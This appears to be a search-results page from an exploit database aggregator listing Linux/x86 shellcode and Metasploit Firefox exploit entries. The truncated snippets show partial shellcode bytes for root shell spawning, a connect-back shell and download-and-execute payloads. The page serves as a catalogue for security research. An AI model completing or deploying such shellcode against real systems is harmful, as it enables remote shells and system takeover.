Lucene search
+L

577 matches found

0day.today
0day.today
added 2006/04/03 12:0 a.m.31 views

linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes

Exploit for linux/x86 platform in category shellcode =================================================================== linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes =================================================================== / Linux/x86 setuid0 + execve"/bin/sh",...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/04/03 12:0 a.m.31 views

linux/x86 - execve"/bin/sh", "/bin/sh", NULL 25 bytes

linux/x86 execve"/bin/sh", "/bin/sh", NULL 25 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve"/bin/sh", "/bin/sh", NULL - 25 bytes - [email protected] / char shellcode = "\x31\xc0" // xor %eax, %eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/04/03 12:0 a.m.14 views

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes

Exploit for linux/x86 platform in category shellcode ======================================================= linux/x86 execve"/bin/sh", "/bin/sh", NULL 23 bytes ======================================================= / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security Linux/x86...

7AI score
Exploits0
0day.today
0day.today
added 2006/03/12 12:0 a.m.24 views

linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+

Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+ ===================================================== / linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+ This shellcode allows you ...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/03/12 12:0 a.m.47 views

linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+

linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+. Shellcode exploit for linx86 platform / linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+ This shellcode allows you to download a binary code straight off a standard HTTP server and execute it. The downloaded shellcode e.g. binary code wi...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2006/02/07 12:0 a.m.16 views

Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)

Mozilla Firefox 1.5 Linux - location.QueryInterface Code Execution Metasploit This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license a...

7.7AI score0.70741EPSS
Exploits16
Exploit DB
Exploit DB
added 2006/02/07 12:0 a.m.46 views

Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)

This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artistic. The latest version of the...

5.1CVSS6.6AI score0.70741EPSS
Exploits16
0day.today
0day.today
added 2006/01/25 12:0 a.m.15 views

linux/x86 execve /bin/sh (encoded by +1) 39 bytes

Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh encoded by +1 39 bytes ================================================= / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcod...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/01/25 12:0 a.m.35 views

linux/x86 - execve /bin/sh encoded by +1 39 bytes

linux/x86 execve /bin/sh encoded by +1 39 bytes. Shellcode exploit for linx86 platform / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" /...

Exploits0
0day.today
0day.today
added 2006/01/21 12:0 a.m.19 views

linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes ===================================================================== / linux/x86 eject cd-rom follows...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.38 views

linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes

linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes. Shellcode exploit for linx86 platform / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik / char shellcode = "\xf7\xf0" // div %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = i...

0.4AI score
Exploits0
0day.today
0day.today
added 2006/01/21 12:0 a.m.15 views

linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes =================================================== / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.48 views

linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes

linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes. Shellcode exploit for linx86 platform / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...

0.1AI score
Exploits0
0day.today
0day.today
added 2006/01/21 12:0 a.m.18 views

linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 getppid + execve/proc/pid/exe 51 bytes ==================================================== / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char...

7AI score
Exploits0
0day.today
0day.today
added 2006/01/21 12:0 a.m.23 views

linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes ===================================================================== / linux/x86 24/7 open cd-rom loop...

7AI score
Exploits0
0day.today
0day.today
added 2006/01/21 12:0 a.m.20 views

linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes ===================================================================== / linux/x86 quick yet conditional, e...

7AI score
Exploits0
seebug.org
seebug.org
added 2006/01/21 12:0 a.m.20 views

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.23 views

linux/x86 normal exit with random so to speak return value 5 bytes

linux/x86 normal exit w/ random so to speak return value 5 bytes. Shellcode exploit for linx86 platform / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char arg...

7.3AI score
Exploits0
Exploit DB
Exploit DB
added 2005/11/09 12:0 a.m.48 views

linux/x86 _exit1; 7 bytes

linux/x86 exit1; 7 bytes. Shellcode exploit for linx86 platform / exit-core.c by Charles Stevenson I made this as a chunk you can paste in to make modular remote exploits. I use it when I need a process to exit cleanly. / char hellcode = / exit1; linux/x86 by core / // 7 bytes exit1 ... 'cause...

Exploits0
0day.today
0day.today
added 2005/11/09 12:0 a.m.38 views

linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes

Exploit for linux/x86 platform in category shellcode =============================================================== linux/x86 ifreadfd,buf,512 I made this as a chunk you can paste in to make modular remote exploits. I use it as a first stage payload when I desire to follow up with a real large...

7AI score
Exploits0
Rows per page
Query Builder